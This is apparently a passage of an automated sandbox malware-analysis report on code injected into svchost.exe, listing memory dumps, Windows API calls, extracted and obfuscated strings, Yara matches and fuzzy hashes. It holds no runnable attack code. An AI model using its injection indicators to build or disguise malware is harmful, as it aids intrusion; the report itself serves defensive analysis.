                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: e8dc8e4d837f76038781e3e591eea9fa3b80493b7cd226883a41c7bec0a9640f
                                                                                                                                • Instruction ID: f2beaaa74330732e25fd8a08b949f1543cbd948280e184a31abf589d3ad3703d
                                                                                                                                • Opcode Fuzzy Hash: e8dc8e4d837f76038781e3e591eea9fa3b80493b7cd226883a41c7bec0a9640f
                                                                                                                                • Instruction Fuzzy Hash: FC900221342445525545F25854445474047E7E03517D9C012A5415955C86269956D621
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 6ccd23a833bb840e8264dce2594608ffdb558aadf62a2e9ba05e1108593b6a30
                                                                                                                                • Instruction ID: 26917ed0f73f38a4eace80e7b34893c04d04172b55752e347161c2f58b8eb265
                                                                                                                                • Opcode Fuzzy Hash: 6ccd23a833bb840e8264dce2594608ffdb558aadf62a2e9ba05e1108593b6a30
                                                                                                                                • Instruction Fuzzy Hash: 9E90023130140813D111B2585544747004AD7D0351FD9C412A442555DD97568A52A121
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 480 7c09b9-7c09c0 481 7c0a18-7c0a91 480->481 482 7c09c2-7c09c4 480->482 487 7c0ac7-7c0adb 481->487 488 7c0a93-7c0aa4 481->488 483 7c09b8 482->483 484 7c09c6-7c09d4 482->484 483->480 484->481 489 7c0ade-7c0afb 487->489 490 7c0b44-7c0b6a call 7d1a00 487->490 493 7c0b6c-7c0b7b PostThreadMessageW 490->493 494 7c0b8a-7c0b90 490->494 493->494 495 7c0b7d-7c0b87 493->495 495->494
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 7-j38IBI$7-j38IBI
                                                                                                                                • API String ID: 0-374207719

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 496 7c0b00-7c0b3d call 7db280 call 7dbc90 call 7c42c0 503 7c0b44-7c0b6a call 7d1a00 496->503 504 7c0b3f call 7b1400 496->504 507 7c0b6c-7c0b7b PostThreadMessageW 503->507 508 7c0b8a-7c0b90 503->508 504->503 507->508 509 7c0b7d-7c0b87 507->509 509->508
                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(7-j38IBI,00000111,00000000,00000000), ref: 007C0B77
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID: 7-j38IBI$7-j38IBI
                                                                                                                                • API String ID: 1836367815-374207719
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                • API String ID: 0-1269752229
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 007D397B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                • String ID: @J7<
                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                • String ID: @J7<
                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 007C4332
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                APIs
                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,007C80DE,00000010,?,?,?,00000044,?,00000010,007C80DE,?,?,?), ref: 007D9583
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                APIs
                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 007B9BA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                APIs
                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 007B9BA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                APIs
                                                                                                                                • RtlAllocateHeap.NTDLL(007C1799,?,007D59C7,007C1799,007D548F,007D59C7,?,007C1799,007D548F,00001000,?,?,00000000), ref: 007D9499
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,205D4511,00000007,00000000,00000004,00000000,007C3B31,000000F4), ref: 007D94D9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,007C1A90,007D7DCF,007D548F,007C1A60), ref: 007C7F43
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,007C1A90,007D7DCF,007D548F,007C1A60), ref: 007C7F43
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE ref: 007C814C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578253368.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3400000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                • API String ID: 0-3558027158
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578253368.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3400000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !!,b$#9by$$#)"$/!(v$=,9$$?$)($N$\Y\M$c}vm$e." $m|c|$yc}m$yx}{$zvmc$~cxc$~c}c
                                                                                                                                • API String ID: 0-2692653123
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                • Opcode ID: 28bc2a890088e73857be3e41f9d1a0cbe9ac56bba41fcf2287fcd78369d76d47
                                                                                                                                • Instruction ID: 512c748b916199f3e699dd92a45fd2eaa41628d98beaeeed50ba4035a54a9085
                                                                                                                                • Opcode Fuzzy Hash: 28bc2a890088e73857be3e41f9d1a0cbe9ac56bba41fcf2287fcd78369d76d47
                                                                                                                                • Instruction Fuzzy Hash: E451E9B5A04616BFCF10DB9CF89097EF7B8BB48200B588969E4A5D7651D334DE40CBA0
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                • Opcode ID: efe8494bed722fac76b7e3ffe103675514f5a9b56a9eee95acf3fa157aba05c9
                                                                                                                                • Instruction ID: 975f04bb8b9f63b2b0f63132807d247594d27badb3e632bcbcfca5972dd0b3f2
                                                                                                                                • Opcode Fuzzy Hash: efe8494bed722fac76b7e3ffe103675514f5a9b56a9eee95acf3fa157aba05c9
                                                                                                                                • Instruction Fuzzy Hash: ED512AB5A006456ECB38EF5CE99087FB7FDFB44200F048C5AE4A6DB695E774EA008760
                                                                                                                                Strings
                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 035A4655
                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 035A4787
                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 035A4742
                                                                                                                                • Execute=1, xrefs: 035A4713
                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035A46FC
                                                                                                                                • ExecuteOptions, xrefs: 035A46A0
                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 035A4725
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                • API String ID: 0-484625025
                                                                                                                                • Opcode ID: e3bfaf553d4e3ce472fea08bb031be22e5fbbcd44d4297938f1525695b14371b
                                                                                                                                • Instruction ID: b194caa1306dc0a56fbc8f4ce96d9a340e1ff2e38a31058a228338e9bb0a2d7b
                                                                                                                                • Opcode Fuzzy Hash: e3bfaf553d4e3ce472fea08bb031be22e5fbbcd44d4297938f1525695b14371b
                                                                                                                                • Instruction Fuzzy Hash: 3D510B756007197AEF20EAA9FC45FAE77B8FF48308F0404E9D505AB2B1D7709A458F90
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578253368.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3400000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ("/:$)4'>$+bn,$<$N$\Y\M$ache$bn*+$no-c
                                                                                                                                • API String ID: 0-2093109865
                                                                                                                                • Opcode ID: 3fb05e69fa03d232aaf4cc268001efecc0ee081d8b3de805b313321174a64664
                                                                                                                                • Instruction ID: 3ec5881253d3cf3ba84d78b299ecb5760edb91cd5c75ec4f5b69779694031a17
                                                                                                                                • Opcode Fuzzy Hash: 3fb05e69fa03d232aaf4cc268001efecc0ee081d8b3de805b313321174a64664
                                                                                                                                • Instruction Fuzzy Hash: FA318A7081478C8FCB04EF91E8446DDFBB0FB44319F80455ED48AAF241DB399545CB86
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                • Instruction ID: 955172805935b54498cf2369d194e2aab1021491f0b1e4da70576387b6497189
                                                                                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                • Instruction Fuzzy Hash: F602F2B5508342AFC309DF18C591A6BBBF5EFC8704F04892DF9999B2A4DB31E905CB52
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-$0$0
                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                • Instruction ID: d135196b6777541c468e469ca19b6bf304c7443fc87467950b63b72111212860
                                                                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                • Instruction Fuzzy Hash: 8181A074E052499EDF24CE68F8917FEBBB6BF45350F1C465AD861AB3B0C73499408B90
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                • Opcode ID: 3846b1d456591609cd9cd47d1acf611c792fb1949c9b97f604b313a571d2a6b7
                                                                                                                                • Instruction ID: f81736da5907aaf8a90791bd95ba864ff6adc7b21976c5d955a6857ecca6579a
                                                                                                                                • Opcode Fuzzy Hash: 3846b1d456591609cd9cd47d1acf611c792fb1949c9b97f604b313a571d2a6b7
                                                                                                                                • Instruction Fuzzy Hash: 6421977AE00259ABCB18EF79EC409EEB7FCFF44640F480515E905E7254E730DA018B91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578253368.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3400000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ("/:$)4'>$+bn,$<$N$\Y\M$bn*+
                                                                                                                                • API String ID: 0-3280869354
                                                                                                                                • Opcode ID: 29a9d5795890a3f69875482f8de69e19c90086437f3984da3d8e31f96fca459c
                                                                                                                                • Instruction ID: e15e8349c99538906671635299c9f46b04edf7232c6ab606cd598cea6c1c52fd
                                                                                                                                • Opcode Fuzzy Hash: 29a9d5795890a3f69875482f8de69e19c90086437f3984da3d8e31f96fca459c
                                                                                                                                • Instruction Fuzzy Hash: 4A3185B0804B8C8ACB04DF90E884ADDFBB1FF44309F80415ED44ABF241DB39554ACB45
                                                                                                                                Strings
                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035A02E7
                                                                                                                                • RTL: Re-Waiting, xrefs: 035A031E
